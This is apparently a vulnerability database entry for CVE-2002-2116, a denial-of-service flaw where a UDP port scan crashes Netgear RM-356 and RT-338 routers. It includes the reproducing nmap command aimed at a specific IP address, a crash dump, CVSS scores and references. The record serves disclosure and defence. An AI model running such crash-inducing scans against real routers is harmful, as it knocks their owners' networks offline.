VAR-200212-0204
Vulnerability from variot - Updated: 2025-04-03 22:35Netgear RM-356 and RT-338 series SOHO routers allow remote attackers to cause a denial of service (crash) via a UDP port scan, as demonstrated using nmap. RM-356 is a hardware router developed by Netgear, suitable for home or small office networks.
UDP scanning will crash RM-356 and RT-338. A cold boot is required to return to normal.
# nmap -sU 210.9.238.103 -T5
At this time, a crashdump occurred on the RM-356 console, and the information is as follows
Menu 24.2.1-System Maintenance-Information
Name: * _ netgear
Routing: IP
RAS F / W Version: V2.21 (I.03) | 3/30/2000
MODEM 1 F / W Version: V2.210-V90_2M_DLS
Country Code: 244
LAN
Ethernet Address: 00: a0: c5: e3: **: **
IP Address: 192.168.0.1
IP Mask: 255.255.255.0
DHCP: Server
CRASHDUMP ::
54f7a0: 00 54 f7 a8 00 21 e9 38 00 54 f8 10 00 21 e9 38 .T ...!. 8.T ...!. 8
54f7b0: 00 00 00 07 00 41 37 bc 00 2b 09 ca 00 00 00 00 ..... A7 .. + ......
54f7c0: 00 55 24 4c 00 2b 09 b2 00 00 00 00 00 55 24 4c .U $ L. + ....... U $ L
54f7d0: 00 00 00 05 00 00 00 00 00 21 16 24 00 57 26 04 .........!. $. W &.
54f7e0: 00 58 5e e8 00 21 16 24 00 00 26 04 00 21 16 24 .X ^ ..!. $ .. & ..!. $
54f7f0: 00 41 20 00 00 54 f8 10 00 21 ea 34 00 41 20 00 .A ..T ...!. 4.A.
54f800: 00 00 00 07 ff ff ff ff 00 54 f8 10 00 21 e6 6e ......... T ...!. N
54f810: 00 54 f8 2c 00 21 e6 6e 00 41 37 bc ff ff ff ff .T.,.!. N.A7 .....
54f820: ff ff 20 04 00 5e 2e 60 00 40 f7 20 00 54 f8 68 .. ^. `. @. .T.h
54f830: 00 21 b0 00 00 00 00 01 00 2b 09 ca ff ff ff ff.! ....... + ......
54f840: 00 00 00 07 00 2b 09 b2 00 5e 2e 60 00 00 00 00 ..... + ... ^. `...
54f850: ff ff ff ff 00 00 00 00 00 00 00 00 00 54 f9 9c ............. T ..
54f860: 00 5e 2e 60 00 00 00 00 00 54 f8 a8 00 21 a8 1a. ^. `..... T ...! ..
54f870: 00 00 00 07 ff ff ff ff 00 5e 2e 60 00 00 00 00 ......... ^. `...
54f880: 00 00 00 08 00 00 00 00 00 00 00 21 00 00 00 24 ...........! ... $
54f890: 00 00 00 00 00 54 f9 9c 00 5f ec d0 00 55 24 4c ..... T ..._... U $ L
54f8a0: 00 55 24 4c 00 5e 2e 60 00 54 f8 fc 00 23 b8 42 .U $ L. ^. `.T ... #. B
Boot Module Version: 4.40. Built at Wed Feb 23 14:00:29 2000
But TCP connect () scans normally.
It is worth noting that even if SNMP 161 / UDP is not open, the above scan will also cause a crash. Problem possible
In the filtering code. Most SOHO Netgear devices have a simple filtering mechanism. It is maintained and distributed by Netgear. Under some circumstances, a portscan of the router could cause a denial of service. It has been reported that portscanning a RM-356 with UDP causes the router to become unstable. This is usually accompanied by a crash, requiring a power cycling of the router to resume normal operation. It is also reported that this problem seems to affect port 161/UDP (SNMP) specifically. This problem has been reported to also affect the RT-338 models, and may affect others
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200212-0204",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rm356",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "*"
},
{
"model": "rt338",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "*"
},
{
"model": null,
"scope": null,
"trust": 0.6,
"vendor": "none",
"version": null
},
{
"model": "rm356",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "rt338",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "rt-338",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
},
{
"model": "rm-356",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2002-0268"
},
{
"db": "BID",
"id": "4111"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-809"
},
{
"db": "NVD",
"id": "CVE-2002-2116"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ben Ryan\u203b ben@bssc.edu.au",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200212-809"
}
],
"trust": 0.6
},
"cve": "CVE-2002-2116",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2002-2116",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-6499",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2002-2116",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200212-809",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-6499",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-6499"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-809"
},
{
"db": "NVD",
"id": "CVE-2002-2116"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear RM-356 and RT-338 series SOHO routers allow remote attackers to cause a denial of service (crash) via a UDP port scan, as demonstrated using nmap. RM-356 is a hardware router developed by Netgear, suitable for home or small office networks. \n\n\u00a0UDP scanning will crash RM-356 and RT-338. A cold boot is required to return to normal. \n\n\u00a0# nmap -sU 210.9.238.103 -T5\n\n\u00a0At this time, a crashdump occurred on the RM-356 console, and the information is as follows\n\n\u00a0Menu 24.2.1-System Maintenance-Information\n\n\u00a0Name: ******* _ netgear\n\n\u00a0Routing: IP\n\n\u00a0RAS F / W Version: V2.21 (I.03) | 3/30/2000\n\n\u00a0MODEM 1 F / W Version: V2.210-V90_2M_DLS\n\n\u00a0Country Code: 244\n\n\u00a0LAN\n\n\u00a0Ethernet Address: 00: a0: c5: e3: **: **\n\n\u00a0IP Address: 192.168.0.1\n\n\u00a0IP Mask: 255.255.255.0\n\n\u00a0DHCP: Server\n\n\u00a0CRASHDUMP ::\n\n\u00a054f7a0: 00 54 f7 a8 00 21 e9 38 00 54 f8 10 00 21 e9 38 .T ...!. 8.T ...!. 8\n\n\u00a054f7b0: 00 00 00 07 00 41 37 bc 00 2b 09 ca 00 00 00 00 ..... A7 .. + ...... \n\n\u00a054f7c0: 00 55 24 4c 00 2b 09 b2 00 00 00 00 00 55 24 4c .U $ L. + ....... U $ L\n\n\u00a054f7d0: 00 00 00 05 00 00 00 00 00 21 16 24 00 57 26 04 .........!. $. W \u0026. \n\n\u00a054f7e0: 00 58 5e e8 00 21 16 24 00 00 26 04 00 21 16 24 .X ^ ..!. $ .. \u0026 ..!. $\n\n\u00a054f7f0: 00 41 20 00 00 54 f8 10 00 21 ea 34 00 41 20 00 .A ..T ...!. 4.A. \n\n\u00a054f800: 00 00 00 07 ff ff ff ff 00 54 f8 10 00 21 e6 6e ......... T ...!. N\n\n\u00a054f810: 00 54 f8 2c 00 21 e6 6e 00 41 37 bc ff ff ff ff .T.,.!. N.A7 ..... \n\n\u00a054f820: ff ff 20 04 00 5e 2e 60 00 40 f7 20 00 54 f8 68 .. ^. `. @. .T.h\n\n\u00a054f830: 00 21 b0 00 00 00 00 01 00 2b 09 ca ff ff ff ff.! ....... + ...... \n\n\u00a054f840: 00 00 00 07 00 2b 09 b2 00 5e 2e 60 00 00 00 00 ..... + ... ^. `... \n\n\u00a054f850: ff ff ff ff 00 00 00 00 00 00 00 00 00 54 f9 9c ............. T .. \n\n\u00a054f860: 00 5e 2e 60 00 00 00 00 00 54 f8 a8 00 21 a8 1a. ^. `..... T ...! .. \n\n\u00a054f870: 00 00 00 07 ff ff ff ff 00 5e 2e 60 00 00 00 00 ......... ^. `... \n\n\u00a054f880: 00 00 00 08 00 00 00 00 00 00 00 21 00 00 00 24 ...........! ... $\n\n\u00a054f890: 00 00 00 00 00 54 f9 9c 00 5f ec d0 00 55 24 4c ..... T ..._... U $ L\n\n\u00a054f8a0: 00 55 24 4c 00 5e 2e 60 00 54 f8 fc 00 23 b8 42 .U $ L. ^. `.T ... #. B\n\n\u00a0Boot Module Version: 4.40. Built at Wed Feb 23 14:00:29 2000\n\n\u00a0But TCP connect () scans normally. \n\n\u00a0It is worth noting that even if SNMP 161 / UDP is not open, the above scan will also cause a crash. Problem possible\n\n\u00a0In the filtering code. Most SOHO Netgear devices have a simple filtering mechanism. It is maintained and distributed by Netgear. \nUnder some circumstances, a portscan of the router could cause a denial of service. It has been reported that portscanning a RM-356 with UDP causes the router to become unstable. This is usually accompanied by a crash, requiring a power cycling of the router to resume normal operation. It is also reported that this problem seems to affect port 161/UDP (SNMP) specifically. This problem has been reported to also affect the RT-338 models, and may affect others",
"sources": [
{
"db": "NVD",
"id": "CVE-2002-2116"
},
{
"db": "CNVD",
"id": "CNVD-2002-0268"
},
{
"db": "BID",
"id": "4111"
},
{
"db": "VULHUB",
"id": "VHN-6499"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2002-2116",
"trust": 2.3
},
{
"db": "BID",
"id": "4111",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200212-809",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2002-0268",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "2332",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20020215 RE: REMOTE DOS IN NETGEAR RM-356",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20020215 REMOTE DOS IN NETGEAR RM-356",
"trust": 0.6
},
{
"db": "XF",
"id": "8206",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-6499",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2002-0268"
},
{
"db": "VULHUB",
"id": "VHN-6499"
},
{
"db": "BID",
"id": "4111"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-809"
},
{
"db": "NVD",
"id": "CVE-2002-2116"
}
]
},
"id": "VAR-200212-0204",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-6499"
}
],
"trust": 0.6147059
},
"last_update_date": "2025-04-03T22:35:06.869000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2002-2116"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/4111"
},
{
"trust": 1.7,
"url": "http://archives.neohapsis.com/archives/bugtraq/2002-02/0183.html"
},
{
"trust": 1.7,
"url": "http://archives.neohapsis.com/archives/bugtraq/2002-02/0162.html"
},
{
"trust": 1.7,
"url": "http://www.iss.net/security_center/static/8206.php"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/2332"
},
{
"trust": 0.3,
"url": "http://www.netgear.com/product_view.asp?xrp=4\u0026yrp=10\u0026zrp=33"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-6499"
},
{
"db": "BID",
"id": "4111"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-809"
},
{
"db": "NVD",
"id": "CVE-2002-2116"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2002-0268"
},
{
"db": "VULHUB",
"id": "VHN-6499"
},
{
"db": "BID",
"id": "4111"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-809"
},
{
"db": "NVD",
"id": "CVE-2002-2116"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2002-02-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2002-0268"
},
{
"date": "2002-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-6499"
},
{
"date": "2002-02-15T00:00:00",
"db": "BID",
"id": "4111"
},
{
"date": "2002-02-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200212-809"
},
{
"date": "2002-12-31T05:00:00",
"db": "NVD",
"id": "CVE-2002-2116"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2002-02-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2002-0268"
},
{
"date": "2008-09-05T00:00:00",
"db": "VULHUB",
"id": "VHN-6499"
},
{
"date": "2002-02-15T00:00:00",
"db": "BID",
"id": "4111"
},
{
"date": "2006-01-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200212-809"
},
{
"date": "2025-04-03T01:03:51.193000",
"db": "NVD",
"id": "CVE-2002-2116"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200212-809"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear SOHO Router UDP Port Scan Denial of Service Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2002-0268"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-809"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "4111"
},
{
"db": "CNNVD",
"id": "CNNVD-200212-809"
}
],
"trust": 0.9
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…